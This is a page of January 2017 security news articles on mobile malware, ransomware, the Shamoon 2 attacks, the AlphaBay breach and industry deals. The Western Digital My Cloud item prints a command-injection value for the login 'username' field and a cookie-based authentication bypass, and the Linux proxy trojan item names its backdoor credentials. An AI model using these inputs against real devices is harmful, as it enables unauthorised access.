English Articles - Úvod  Odborné èlánky  Bleskovky  Témata  List  EN  CZ  Seriály  Blogy  ÈlánkyCZ

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


Fake Netflix App Takes Control of Android Devices

25.1.2017 Securityweek Android
A recently spotted fake Netflix app is in fact installing a Remote Access Trojan (RAT) variant onto the victims’ devices, Zscaler security researchers have discovered.

Preying on the popularity of applications isn’t a new technique, with fake Super Mario Run games for Android recently used to distribute the Marcher and DroidJack Trojans. Now, it seems that the actors behind the SpyNote RAT have decided to use the same technique and leverage the enormous traction Netflix has among users looking to stream full movies and TV programs to their mobile devices.

Instead of a video streaming app, however, users end up with a RAT that can take advantage of their device in numerous ways, such as listening to live conversations by activating the microphone, executing arbitrary commands, sending files to a command and control (C&C) server, recording screen captures, viewing contacts, and reading SMS messages.

The fake Netflix app was supposedly created using an updated version of the SpyNote RAT builder, which leaked online last year, Zscaler reveals. Once installed, the app would display the icon that the legitimate Netflix app on Google Play has, but it should by no means be mistaken for it.

When the user clicks on the icon for the first time it disappears from the homescreen and nothing else seems to happen, a trick commonly used by mobile malware. In the background, however, the malware starts preparing its onslaught of attacks.

SpyNote RAT was found to use a free DNS service for C&C communication, as well as to leverage the Services, Broadcast Receivers, and Activities components of the Android platform to remain up and running on the infected device.

“Services can perform long-running operations in the background and does not need a user interface. Broadcast Receivers are Android components that can register themselves for particular events. Activities are key building blocks, central to an app’s navigation, for example,” Zscaler researchers note.

Additionally, the malware can uninstall apps from the infected device (such as antivirus protections), was designed to function only over Wi-Fi (to avoid raising suspicion), and can even click photos, the security researchers say. SpyNote RAT also collects the device’s location to identify the exact location of the victim, and packs various data exfiltration capabilities.

According to Zscaler, the SpyNote RAT builder was seen gaining popularity in the hacking community. It can be used to create various fake apps to masquerade the malware, such as WhatsApp, YouTube Video Downloader, Google Update, Instagram, Hack Wifi, AirDroid, WifiHacker, Facebook, Photoshop, SkyTV, Hotstar, Trump Dash, and Pokemon GO (the game was abused for malware distribution even before being launched on Android).

“Furthermore, we found that in just the first two weeks of 2017, there have been more than 120 such spyware variants already built using the same SpyNote Trojan builder as SpyNote RAT and roaming in the wild,” the security researchers say. A similar trend is usually observed after the source code of a piece of malware leaks online.

To stay protected, users should refrain from installing applications via third-party app stores or to side-load them, especially if they are games that haven’t yet been released on Android, such as Super Mario Run or Pokemon GO. “You should also avoid the temptation to play games from sources other than legitimate app stores; such games are not safe and may bring harm to your reputation and your bank account,” Zscaler concludes.

Dutch Man on Trial in 'Sextortion' Cyberbully Case

25.1.2017 Securityweek Crime
Amsterdam - A man accused of a worldwide cyberbullying racket that got young girls to pose naked before blackmailing them went on trial Wednesday in Amsterdam, saying he is innocent of the charges.

The defendant Aydin C. is suspected of forcing dozens of young women from as far as Britain, Canada, Norway and the United States into performing sex acts in front of their webcams.

"I deny all charges and will remain silent until my closing statement," a defiant Aydin C. -- identified only by his first name because of Dutch privacy rules -- told judges at a high-security courthouse.

The 38-year-old Dutchman faces 72 charges including computer sex crimes such as making and storing of child pornography, blackmail, fraud and hard drug possession, prosecutors said.

Aydin C. is also wanted for trial in Canada in the case of teen Amanda Todd who committed suicide in October 2012 after being tormented by an anonymous cyberbully.

Sexual acts

"He posed online as a young woman and established trust relationships with 34 young girls, eventually getting them to pose naked in front of a webcam," Dutch public prosecution service spokesman Lars Stempher told reporters outside the courtroom.

Once Aydin C. obtained the images, his tone changed and he would start to threaten the girls, telling them he would show the images to parents, relatives and school friends if they did not do as told.

"This included performing sexual acts and in the end the girls became trapped in his web," Stempher said.

Five gay men -- mainly in Australia -- were also lured in, when Aydin C. allegedly posed as a young boy and "eventually he threatened them that he would expose their sexuality, leading to blackmail."

In one case, an amount of 1,000 euros ($1,100) was then paid into an account, the court heard. Aydin C. used dozens of aliases like "Tyler Boo" and "Kelsy Rain" and employed different computer tricks, including a program to fool young girls into thinking they were chatting live to a girl of similar age. Investigators found some 204,000 images on hard disks belonging to the accused, but prosecutors did not say what the images depicted.

Aydin C., who leaned back in his chair during the hearing, his long greying hair slicked back behind his ears, did not respond to questions posed by the judge.

He was arrested after Facebook rang alarm bells in 2013, telling Dutch police a "sextortionist" -- somebody who uses sex to blackmail others -- was at work in The Netherlands.

Teen suicide

Canada has asked for Aydin C. to be extradited in the case of teen Amanda Todd who committed suicide in October 2012 after being tormented by an anonymous cyberbully.

"The notorious case, that of Amanda Todd regularly pops up in this case docket," Judge Karel Brunner said.

"That case is not before the court today. Obviously the Canadian authorities are planning to prosecute," the judge said.

A Dutch court in June last year ruled in favour of Aydin C.'s extradition to Canada to stand trial in connection with Todd's death. The extradition case is under appeal before the Dutch highest Supreme Court.

The 15-year-old's suicide sparked a worldwide debate about appropriate online behaviour, and prompted calls for cyberbullying to be criminalised.

In a YouTube video watched by millions worldwide, Todd said before her death that she suffered from anxiety, "major depression" and panic attacks after a photo of her breasts, flashed in an online video chat with a stranger, was distributed in her community.

If extradited, Aydin C. however will be sent to Canada only after the end of his trial in the Netherlands prosecutors said, meaning it could still take years.

Commenting on the Dutch case, Aydin C.'s lawyer Robert Malewicz told AFP outside the courtroom "we are disputing that there is a proper link between the evidence presented and my client."

"We will ask for an acquittal," he said.

Cisco Buys App Performance Tuning Startup for $3.7 Billion

25.1.2017 Securityweek IT
San Francisco - Cisco Systems on Tuesday announced a $3.7 billion deal to buy a startup specializing in improving the performance of applications, continuing to expand beyond computer networking hardware.

The acquisition of AppDynamics came as the San Francisco-based startup was on the cusp of going public with an initial offering of stock.

AppDynamics software enables businesses to monitor performance of applications and figure out ways to avoid problems and get them to run more smoothly.

"Applications have become the lifeblood of a company's success," Cisco internet of things and business group general manager Rowan Trollope said in a release.

"The combination of Cisco and AppDynamics will allow us to provide end to end visibility and intelligence from the network through to the application."

Consumers are increasingly using applications, typically on mobile devices, to interact with businesses.

"As companies across industries are expanding their digital infrastructure, IT departments are faced with vast amounts of complex, siloed data," Cisco corporate business development vice president Rob Salvagno said in a blog post.

"AppDynamics helps many of the world's largest enterprises translate this data into business insights."

The deal was expected to close by the end of September.

Cisco last year announced it was trimming its global workforce by seven percent as it shifts its focus from networking hardware to software and services.

The plan to eliminate 5,500 positions came as part of a corporate restructuring aimed at reducing expenses in "lower growth areas" and investing in Cisco priorities such as security, cloud computing, data centers, and the internet of things, executives said at the time.

Faced with a slowdown in its traditional products such as routers for telecom networks, Cisco has been trying for several years to reorient to fast growing sectors.

The company also seeks to increase revenue from ongoing subscriptions for services or software, as compared to sales of equipment.

Cisco built its fortune on hardware for private data centers, but businesses are increasingly turning to "super-clouds" such as Amazon Web Services and Microsoft Azure which rent processing muscle as needed.

Switches and routers remain a big chunk of Cisco's business.

Northern California-based Cisco has had waves of job cuts from 2011 through 2014, eliminating a total of more than 17,000 positions.

Western Digital Patches Vulnerabilities in "My Cloud" Products

25.1.2017 Securityweek Vulnerebility
The latest firmware update released by Western Digital for the My Cloud Mirror personal cloud storage product patches serious remote command execution and authentication bypass vulnerabilities.

ESET researcher Kacper Szurek recently discovered that WD My Cloud Mirror devices running firmware version 2.11.153, which had been the most recent version, were affected by several vulnerabilities caused by the lack of proper user input escaping.

The most serious of the flaws affects the index page of the product’s web interface and it allows an attacker to execute arbitrary commands via the “username” parameter. Commands can be executed using the following line as “username”: a" || your_command_to_execute || "

Szurek also discovered that an attacker can bypass authentication to the WD My Cloud Mirror interface. The problem, according to the expert, is that the function designed to check if the user has logged in can be easily bypassed as it only checks if the “username” and “isAdmin” cookies exist.

An attacker can bypass authentication by setting the values “username=1” and “isAdmin=1,” and then accessing one of the webpages (e.g. php/users.php).

The vulnerabilities were reported to WD in mid-November and they were patched on December 20 with the release of version 2.11.157 of the firmware. The vendor’s release notes describe these issues as a “security vulnerability related to remote access.”

Earlier this month, researcher Steven Campbell also reported finding a couple of flaws in WD’s My Cloud devices, including a command injection issue. The vendor patched the command injection vulnerability (CVE-2016-10108) in December with the release of firmware version 2.21.126. The second bug, tracked as CVE-2016-10107 and described as “variable checking for PHP pages for authenticated users,” will be addressed with an upcoming update.

This was not the first time researchers found security holes in WD’s personal cloud storage products. VerSprite identified a remote command injection vulnerability in My Cloud in September 2015.

Charger Android Ransomware Infects Apps on Google Play

25.1.2017 Securityweek Android
A newly discovered piece of Android ransomware embedded in apps available on Google Play threatens to sell a victim's personal data on the black market if they don’t pay, Check Point security researchers warn.

Dubbed Charger, the threat was found embedded in an application called EnergyRescue, and had the ability to steal contacts and SMS messages, while also asking for admin permissions on the device. If permissions are granted, the ransomware locks the device and displays a message demanding payment.

While threatening to sell victim’s personal information on the black market, the malware authors also claim that all of the victim’s data has been already saved on an attacker-controlled server. The miscreants say that the stolen information includes social network details, bank accounts, credit cards, as well as all data about the victim’s “friends and family.”

The demanded ransom is 0.2 Bitcoins (around $180), which “is a much higher ransom demand than has been seen in mobile ransomware so far,” Check Point notes. Previously spotted mobile ransomware such as DataLust only demanded a $15 ransom. Charger victims are asked to send the payments to a specific Bitcoin account.

With Android ransomware inflicting direct harm to users, it’s clear that Charger is yet another attempt by mobile malware developers to catch up with the PC ransomware, which has been wreaking havoc for the past couple of years. Recently, even the Tordow Android banking Trojan was seen packing data collection capabilities and ransomware-like behavior.

Charger was observed checking the infected device’s location to ensure it doesn’t run on those located in Ukraine, Russia, or Belarus, supposedly in an attempt to avoid being prosecuted in their own countries or being extradited between countries.

While other malware in Google Play uses a dropper to download the malicious payload, Charger uses a heavy packing approach, which makes it harder for it to stay hidden. However, the ransomware authors did boost its evasion capabilities to ensure it can stay hidden in Google Play: the malware encodes strings into binary arrays to make it hard to inspect them, loads code from encrypted resources dynamically, and checks whether it runs in an emulator before running its routine.

According to Check Point, most detection engines cannot penetrate and inspect dynamically-loaded code, and the authors added an extra layer of protection by flooding the code with meaningless commands to mask the actual commands passing through. The researchers also point out that more and more mobile malware is running checks to avoid running in emulators and virtual machines, just as it happens in the PC malware landscape.

"Ripper" Service Helps Cybercriminals Identify Fraudsters

25.1.2017 Securityweek Crime
Researchers at threat intelligence firm Digital Shadows have analyzed a relatively new service named Ripper that aims to expose fraudsters who target the users of cybercrime marketplaces.

The people behind Ripper.cc started discussing the idea in mid-2015, but the service was only launched in June 2016. Currently, it stores information on more than 1,200 monikers that have been used to commit fraud on cybercrime forums.

While some cybercriminals earn money by selling stolen information, others, known as “rippers,” make a profit by selling fake login credentials, invalid payment card data, or items they don’t actually possess.

Escrow systems and blacklists have been used to minimize the risks posed by fraudsters, but these methods can be inconvenient or inefficient. One service that has been trying to fight rippers since 2005 is Kidala, a Russian website that provides a database of users known to have committed fraud.

However, some believe Kidala is not always impartial and it allows rippers to remove their name by paying a fee.

Ripper is available in English and it provides some highly useful features. Users can install Chrome and Firefox extensions that automatically highlight the name of a ripper on a website. The service also provides a plugin for the Jabber client Psi Plus, which highlights fraudsters in the messaging app’s contact list.


The website allows users to create ripper profiles that track a user across multiple forums, and it also stores specific examples of scams conducted by rippers.

Digital Shadows has pointed out that the development of Ripper is similar to how legitimate tech startups create their products.

“The founders plainly acknowledge their intention to displace the previous main player – kidala.info – and try to win customers over by promising better features. They also have to prove their credentials – in this case by saying that a number of well-known forums support this project and their existing reputation on these forums,” Digital Shadows analysts explained.

The site’s operators have promised to make the code open source to show that the plugins don’t include any malicious functionality, and they plan on making a profit by displaying ads on the website. In the future, they might launch an escrow service of their own and a mobile application.

“Ripper[.]cc is another example of the industrialization of hacking and the growing professionalism of cybercrime. If such a service becomes successful, it enables cyber criminals to significantly reduce the risks associated with rippers and the overall cybercrime economy can become more profitable allowing for further growth,” analysts said.

New Trojan Turns Thousands Of Linux Devices Into Proxy Servers
25.1.2017 thehackernews

"Linux doesn't get viruses" — It's a Myth.
A new Trojan has been discovered in the wild that turns Linux-based devices into proxy servers, which attackers use to protect their identity while launching cyber attacks from the hijacked systems.
Dubbed Linux.Proxy.10, the Trojan was first spotted at the end of last year by the researchers from Russian security firm Doctor Web, who later identified thousand of compromised machines by the end of January this year and the campaign is still ongoing and hunting for more Linux machines.
According to researchers, the malware itself doesn't include any exploitation module to hack into Linux machines; instead, the attackers are using other Trojans and techniques to compromise devices at the first place and then create a new backdoor login account using the username as "mother" and password as "fucker."
Once backdoored and the attacker gets the list of all successfully compromised Linux machines, and then logs into them via SSH protocol and installs the SOCKS5 proxy server using Linux.Proxy.10 malware on it.
This Linux malware is not at all sophisticated since it uses a freeware source code of the Satanic Socks Server to setup a proxy.
According to the security firm, thousands of Linux-based devices have already been infected with this new Trojan.

Besides this, the same server — belonging to the cybercriminals who distribute the Linux.Proxy.10 malware — not only contained the list of compromised devices but also hosted the control panel of a Spy-Agent computer monitoring software and a Windows malware from a known family of Trojan spyware, called BackDoor.TeamViewer.
This is not the first time when such Linux malware has been discovered.
Over a year ago, ESET security researchers uncovered a similar malware, dubbed Moose, that also had the capability to turn Linux devices into proxy servers that were then used for launching armies of fake accounts on social media networks, including Instagram, and Twitter.
Linux users and administrators are recommended to tighten SSH security by limiting or disabling remote root access via SSH, and to know if your system has already been compromised, keep a regular watch on newly generated login users.

AlphaBay Dark Web Marketplace Hacked; Exposes Over 200,000 Private Messages
25.1.2017 thehackernews Hacking
AlphaBay, possibly the largest active dark web marketplace at the moment, has paid a hacker after he successfully exploited vulnerabilities in the internal mailing system of the website and hijacked over 200,000 private unencrypted messages from several users.
The hacker, using the pseudonym Cipher0007, disclosed two "high-risk bugs" two days ago on Reddit that allowed him to gain access to troves of private messages belonging to buyers and sellers on the dark website, AlphaBay admins announced on Tuesday.
It turns out that the messages were not encrypted by default, which gave the hacker ability to view all messages between vendors and buyers selling and purchasing everything from illicit drugs to exploits, malware, and stolen data.
Over 218,000 Private Messages of Anonymous Dealers Exposed

To prove he had successfully compromised the AlphaBay website, the hacker posted five screenshots of random user private conversations, showing that AlphaBay users had openly exchanged their names, personal addresses and tracking numbers without encryption.
"We have been made aware of the bug that allowed an outsider to view marketplace private messages, reads a statement from the AlphaBay administrators on Pastebin, and "we believe that the community has the right to be made aware of what information was obtained."
A first vulnerability allowed the hacker to obtain more than 218,000 personal messages sent between their users within the last 30 days, while the second bug allowed him to obtain a list of all usernames and their respective user IDs.
However, the AlphaBay admins assured that those users who did not receive any message in their inboxes in the last 30 days were not affected. They also claimed the bugs were only exploited by one single hacker.
AlphaBay Fixes the Bugs and Pays the Hacker
The admins also assured their users that AlphaBay forum messages, order data, and Bitcoin addresses of users are all safe, and the issue was fixed just within four hours after the Reddit user went public.
"The attacker was paid for his findings, and agreed to tell us the methods used to extract such information," AlphaBay admins said. "Our developers immediately closed the loophole in order to protect the security of our users."
Meanwhile, they advised AlphaBay users to make use of a PGP key and always encrypt their sensitive data, including delivery addresses, Bitcoin wallet IDs, tracking numbers, and others.
Since AlphaBay is a Dark Web marketplace, which is only accessible via the Tor Browser, the bug could have been exploited by law enforcement to unmask users real identities who deal in drugs and other illegal activities.
But, AlphaBay members using the PGP key and encrypting their account details would be on a safer side.
This is not the very first time when a hacker discovered a flaw in the AlphaBay dark website. AlphaBay faced a similar vulnerability in April last year when its users' private messages were left exposed due to a flaw in its newly-launched API, allowing an attacker to obtain 13,500 private messages.

Russia arrested Ruslan Stoyanov the head of the investigation unit at the Kaspersky in ‘Treason Probe’
25.1.2017 securityaffairs Congress

Russian authorities arrested Ruslan Stoyanov the head of the investigation unit at the Kaspersky Lab in ‘Treason Probe’.
A sad news is shocking the IT security industry, the Russian authorities arrested Ruslan Stoyanov, one of the most important cybercrime investigators working for the Kaspersky Lab.

Ruslan Stoyanov is the head of the investigation unit at the Kaspersky Lab, according to the security firm he is under investigation for a period predating his employment at Kaspersky Lab. Stoyanov was involved in every big anti-cybercrime operation in Russia in past years, including the one against the components of the Lurk cybercrime gang.

“This case is not related to Kaspersky Lab. Ruslan Stoyanov is under investigation for a period predating his employment at Kaspersky Lab,” reported Forbes citing a Kaspersky spokesperson’s statement. “We do not possess details of the investigation. The work of Kaspersky Lab’s Computer Incidents Investigation Team is unaffected by these developments.”

According to the “Kommersant” the arrest may be linked to the investigation on into Sergei Mikhailov, deputy head of the information security department of the FSB (The Russia national security service).

Stoyanov and Mikhailov were both arrested in December, according to the Kommersant the investigation was exploring the receipt of money from foreign companies by Stoyanov and his links to Mikhailov.

The case appears to be very important, according to a source quoted by FORBES the details of the investigation were likely to remain private.
“A Russia-based information security source told FORBES the details of the case were likely to remain private. The case has been filed under article 275 of Russia’s criminal code, the source said, meaning it should result in a secret military tribunal. Article 275 allows the government to prosecute when an individual provides assistance to a foreign state or organization regarding “hostile activities to the detriment of the external security of the Russian Federation” (translation from source). According to the source, this can be applied broadly. For instance, furnishing the FBI with information on a botnet may amount to treason.” reported FORBES.

Who is Stoyanov?

Before Stoyanov joined Kaspersky in 2012, he served six years as a major in the Ministry of Interior’s cybercrime unit between 2000 and 2006, then he moved into the private sector.

FORBES was also informed that while Ruslan Stoyanov was working for the Russian government, he was the lead investigator into a hacker crew that extorted $4 million to U.K. betting shops under the DDoS threat.

Three members of the cyber gang were identified and arrested by the investigators.

Stay tuned.

Symantec speculates Shamoon 2 attacks aided by Greenbug hackers
25.1.2017 securityaffairs

Security researchers at Symantec believed that Shamoon 2 attacks leveraged credentials stolen by hackers of the Greenbug group.
A few days ago security experts at Palo Alto Networks have spotted a new strain of the Shamoon 2 malware that was targeting virtualization products.

In December malware researchers from Palo Alto Networks and Symantec discovered a new variant of Shamoon, so-called Shamoon 2, that was used at least in a targeted attack against a single Saudi organization, the Saudi Arabia’s General Authority of Civil Aviation (GACA).

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

“Last week, Unit 42 came across new Disttrack samples that appear to have been used in an updated attack campaign. The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. In another similarity to Shamoon, this is the end of the work week in Saudi Arabia (their work week is from Sunday to Thursdays), so the malware had potentially the entire weekend to spread. The Shamoon attacks took place on Lailat al Qadr, the holiest night of the year for Muslims; another time the attackers could be reasonably certain employees would not be at work.” reads an analysis published by Palo Alto Networks.

shamoon 2

Shamoon, also known as Disttrack, was first spotted in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco. The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.

In the attack against Saudi Aramco Shamoon wipe data on over 30,000 computers and rewrite the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The second variant of Shamoon 2 was spotted by Palo Alto Networks that had been configured to start wiping infected systems at 1:30 AM (Saudi Arabia time) on November 29, when the employees of the targeted organization’ were likely at home.

The first variant of Shamoon 2 analyzed by the experts presented a default configuration that allowed the execution of the disk-wiping component at 8:45pm local time on Thursday, November 17. Considering that in Saudi Arabia the working week runs from Sunday to Thursday, the attacker tried to exploit the pause in order to maximize the effects of the attack.

Both payloads were similar, but the analysis of the experts revealed some differences.

Threat actors used stolen credentials to deliver the malware on the target systems, according to researchers at Symantec they may have been provided by another cyber espionage group called Greenbug.

Greenbug hackers used the Ismdoor remote access Trojan (RAT) and other tools in attacks against organizations in the Middle East.

The Ismdoor establish a backdoor on the target machine and leverages PowerShell for command and control (C&C).

The group targeted organizations in multiple industries, including aviation, investment, government and education organizations in several countries (i.e. Saudi Arabia, Iran, Iraq, Bahrain, Qatar, Kuwait and Turkey, and a Saudi company in Australia).

“Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors. The group uses a custom information-stealing remote access Trojan (RAT) known as Trojan.Ismdoor as well as a selection of hacking tools to steal sensitive credentials from compromised organizations.” states the Symanted report on Greenbug.

“Although there is no definitive link between Greenbug and Shamoon, the group compromised at least one administrator computer within a Shamoon-targeted organization’s network prior to W32.Disttrack.B being deployed on November 17, 2016.”

The Greenbug launched spear phishing attacks against its victims in order to trick users into downloading the malicious code onto their systems. The email messages are fake business proposals that delivered a RAR archive that stored a clean PDF and a compiled HTML help file (.chm) that contained the Ismdoor Trojan.

The Greenbug hackers exploited the alternate data streams (ADS) to avoid detection.

“Windows Alternate Data Streams (ADS) is a feature of NTFS which is used to store details about a file. The information stored in ADS is hidden to the user, which makes it an attractive feature for attackers. ADS is sometimes abused by attackers to hide malware or other hacking tools on a compromised computer.” continues the analysis.

Researchers at Symantec speculate that Greenbug may have supplied credentials for the Shamoon 2 attacks. The experts detecting the Ismdoor malware on an administrator computer belonging to one of the organizations targeted with Shamoon 2.

It is important to highlight that there is no technical evidence that Greenbug and Shamoon 2 attackers are linked, but it is interesting to note that Greenbug seems to have vanished one day before the November 17 attacks.

“The presence of Greenbug within an organization prior to the destructive attack involving W32.Disttrack.B provides only a tentative connection to Shamoon. Greenbug’s choice of targets and the fact that Ismdoor and associated tools downloaded by the threat appear to have gone quiet a day prior to the November 17, 2016 Shamoon attack is, however, suspicious.” reads the report.

Saudi Arabia is warning organizations of a wave of Shamoon 2 attacks
25.1.2017 securityaffairs

Saudi Arabia is warning organizations in the country of a resurrection of the dreaded Shamoon malware.
A new strain of the Shamoon 2 malware was spotted by the security experts at Palo Alto Networks, this variant targets virtualization products.

Shamoon, also known as Disttrack, was first spotted in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco and RasGas Co Ltd.

In the 2012 attacks, threat actors used images of a burning U.S. flag to overwrite the drives of victims.

The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.

In the attack against Saudi Aramco Shamoon wipe data on over 30,000 computers and rewrite the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The first team that discovered the malware was Kaspersky Lab that had analyzed some instances of the threat linked to the “wiper agent” due to the presence of a module of a string with a name that includes “wiper” as part of it.

On Monday, the Saudi Arabian labor ministry revealed it had been attacked and also a chemical firm reported a network disruption.


A state news agency confirmed the attack against the labor ministry, but excluded any impact on the data.

The Reuters agency also revealed that the telecoms authority is inviting all parties to be vigilant for the spreading of a new version of the malware, the Shamoon 2.

According to security experts, the threat actor behind the Shamoon attacks was likely working on behalf of the Iranian government in 2012.

“The Shamoon hackers were likely working on behalf of the Iranian government in the 2012 campaign and the more-recent attacks, said Adam Meyers, vice president with cyber security firm CrowdStrike. “It’s likely they will continue,” he said.” reported the Reuters.

The State-controlled Al Ekhbariya TV confirmed that multiple Saudi organizations had been targeted in recent string of cyber attacks.

The Sadara Chemical Co, a joint venture firm owned by Saudi Aramco and Dow Chemical, confirmed it had suffered a network disruption on Monday morning. The experts at the company are still working to resolve the problem.

Sadara | صدارة ✔ @Sadara
Sadara has experienced a network disruption this morning, and are working to resolve it. Our operations have not been affected.
3:49 PM - 23 Jan 2017
15 15 Retweets 9 9 likes
As part of the incident response, the company had stopped all services related to the network.

The Reuters said that other companies in petrochemicals Jubail hub also experienced network disruptions.

“Those companies sought to protect themselves from the virus by shutting down their networks, said the sources, who declined to identify specific firms.” states the Reuters.

Saudi Arabia Computer Emergency Response Team (CERT)’s Abdulrahman al-Friah confirmed to Al Arabiya that at least 22 institutions were affected by the wave of Shamoon attacks.

“We cannot definitely determine the financial costs of such breaches yet as it depends on each institutions platform. Websites which sell and buy will obviously be affected the most,” Fiah said.

Sage 2.0 Ransomware is spreading and demands a $2,000 Ransom
25.1.2017 securityaffairs

A newly observed spam campaign is spreading a ransomware variant known as Sage 2.0 that is demanding a $2,000 ransom for the decryption key.
Sage 2.0 is a new ransomware recently spotted by security experts, it was first observed in December and not now it is distributed via malicious spam. Sage is considered a variant of CryLocker ransomware, it is being distributed by the Sundown and RIG exploit kits. The current campaign also leverages steganography to exfiltrate information about the victim’s PC inside a PNG image.

sage 2.0

The malicious messages have a ZIP attachment that contains a Word document with malicious macros that once executed download and install the Sage ransomware. In some cases the experts also observed that the ZIP archive contains a .js file with the same functionality.

Duncan also explained that some of the malicious attachments are double-zipped and often the recipient’s name is part of the attachment’s file name.

“Emails from this particular campaign generally have no subject lines, and they always have no message text. The only content is a zip attachment containing a Word document with a malicious macro that downloads and installs ransomware. Sometimes, I’ll see a .js file instead of a Word document, but it does the same thing.” Duncan wrote in a report. “Often, the recipient’s name is part of the attachment’s file name. I replace those names with [recipient] before I share any info. A more interesting fact is the attachments are often double-zipped. They contain another zip archive before you get to the Word document or .js file.”

When the Sage 2.0 ransomware infects a Windows 7 machine it triggers the User Account Control (UAC) technology, this means that the user has to authorize its execution.

The ransom note includes instructions to pay an initial $2,000 ransom (or 2.22188 bitcoin). The ransomware uses a Tor-based domain with a decryptor screen.

In case of non-payment, the fee will increase over the time, but after a deadline reported on the Tor website the victim will be able possible to recover its files.

“The infected Windows host has an image of the decryption instructions as the desktop background. There’s also an HTML file with the same instructions dropped to the desktop. The same HTML file is also dropped to any directory with encrypted files. ‘.sage’ is the suffix for all encrypted files,” the security researcher explains.

The Sage ransomware maintains persistent on the infected machine by a scheduled task, and it’s stored as an executable in the user’s AppData\Roaming directory.

The Sage 2.0 ransomware generates post-infection traffic, like the CryLocker ransomware, in the form of HTTP POST requests. Sage traffic is different from CryLocker one because it is encrypted in some way.

“When the callback domains for Sage didn’t resolve in DNS, the infected host sent UDP packets sent to over 7,000 IP addresses. I think this could be UDP-based peer-to-peer (P2P) traffic, and it appears to be somehow encoded or encrypted,” added the security researcher.

“I’m not sure how widely-distributed Sage ransomware is. I’ve only seen it from this one malspam campaign, and I’ve only seen it one day so far. I’m also not sure how effective this particular campaign is. It seems these emails can easily be blocked, so few end users may have actually seen Sage 2.0. Still, Sage is another name in the wide variety of existing ransomware families. This illustrates how profitable ransomware remains for cyber criminals,” Duncan concludes.

TorWorld helps you to manage a Tor node, promising an upcoming Tor-as-a-Service
25.1.2017 securityaffairs Safety

The TorWorld initiative aims to build a community area for those people that desire to set up either a Tor Relay or a Tor Exit node.
We all recognize the importance of the Tor network, an important instrument to protect users’ anonymity and avoid censorship. Today I desire to present you an interesting initiative launched by Tor passionates, the TorWorld, belonging to the CryptoWorld Foundation.

The CryptoWorld Foundation groups several organizations that provide anonymity services. The TorWorld aims to build a community area for those people that desire to set up either a Tor Relay or a Tor Exit node.

According to Bleepingcomputer.com, the project born out of a real necessity:

“The idea for ‘TorWorld’ came about four months ago,” Beard, one of TorWorld’s founding members told Bleeping Computer.

“We originally ran a few Guard Relays for a little over a year privately,” Beard continued. “After we had an issue with our Guard nodes being removed by our ISP at the time because of a misunderstanding, we thought about possibly setting up a service dedicated to running Tor nodes, and educating people on Tor.”

“Eventually we started that [idea], and at first we looked for automation scripts to make it easier for us to deploy multiple Tor servers in a fast and dynamic way,” Beard said. “To our surprise, we couldn’t find a single script.”

The team at the TorWorld published scripts simplify the set up of a Tor node, including Bash scripts for quickly deploying Tor guard (entry) nodes, Tor relay (middle) servers, Tor bridges (unlisted relays), and Tor exit nodes.

The project is ambitious and we can only wish the team great success, representatives from the TorWorld confirmed that the intention of the team to become a hosting provider for Tor servers and they are thinking to a sort of Tor-as-a-Service (TaaS).

Beard explained that the final goal it to allow users to create a Tor nodes on top of TorWorld’s server infrastructure in a single click thanks to a set of open-sourced Bash scripts.

This is an important step, unfortunately, today the set up of a Tor node is not a simple operation for everyone despite it is very well documented on the official Tor Project website.

“We’ll be adding more dynamic customization options for the FastRelay, and FastExit scripts,” Beard added.

TorWorld will also offer a platform to manage abuse notices for Tor servers operated by its users. It will be a paid service because a TorWorld team will handle their abuse notifications.

We all know that darknets represent a facilitator and aggregator for cyber criminal communities and the Tor network is one of the most popular anonymizing netwotk in the criminal underground.

The TorWorld will not allow criminal uses of its infrastructure.

Currently, there is no certainty about when and how the TorWorld TaaS service will be ready, anyway I’ll monitor its progress with a great interest and admiration.

HummingWhale – HummingBad Android Malware returns even more dangerous than before
25.1.2017 securityaffairs Android

Last year, the HummingBad Android malware infected as many as 85 million devices, now it has returned under the new name of HummingWhale.
CERT-EU and other sources corroborated Check Point researchers’ findings which recently confirmed a new variant of the ad-fraud-big-money-making, HummingBad, is spreading rapidly on the Android marketplace Google Play. HummingBad was first seen and released almost a year ago in January/February 2016 by malware authors Yingmob, and racking upwards of approx. $300,000 USD per month for the better half of 2016. Approximately 10 million Android devices were infected in the firm part of the last year.

Now, dubbed by Check Point, “HummingWhale” is at large with better ad fraud capabilities and sophisticated techniques than HummingBad affecting several applications and has been downloaded several million times from the combined list of applications downloaded.

“Check Point researchers have found a new variant of the HummingBad malware hidden in more than 20 apps on Google Play. The infected apps in this campaign were downloaded several million times by unsuspecting users” reads the report published by CheckPoint security.


Check Point first came to know this when they uncovered something interesting with Trojan-riddled apps published under the “fake” names of developers of Chinese origin and the apps behavior at startup. In addition, the startup behavior, closing the application normally does not exit cleanly. Instead, it “minimizes” covertly and remains running in the virtual environment.

Moreover, the apps carried a payload of 1.3MB and disguised itself as an image called group.png however it is anything but. The payload contained is an executable apk file.

“This .apk operates as a dropper, used to download and execute additional apps, similar to the tactics employed by previous versions of HummingBad. However, this dropper went much further. It uses an Android plugin called DroidPlugin, originally developed by Qihoo 360, to upload fraudulent apps on a virtual machine.”, said Oren Koriat, Mobile Cyber Security Analyst @ Check Point

What makes HummingWhale unique from the original is that it runs the downloaded application without having to get root and or elevated privileges making the phone susceptible to further fraudulent applications or further deployment of remote access tools (RATs).

Further information is available in the report, including Indicators of Compromise (IoCs).

Apple Patches Dozens of Vulnerabilities Across Product Lines

24.1.2017 Securityweek Apple
Apple this week released a new set of important security updates for its products, to patch dozens of vulnerabilities in macOS, iOS, watchOS, tvOS, and Safari, as well as in the iCloud and iTunes for Windows applications.

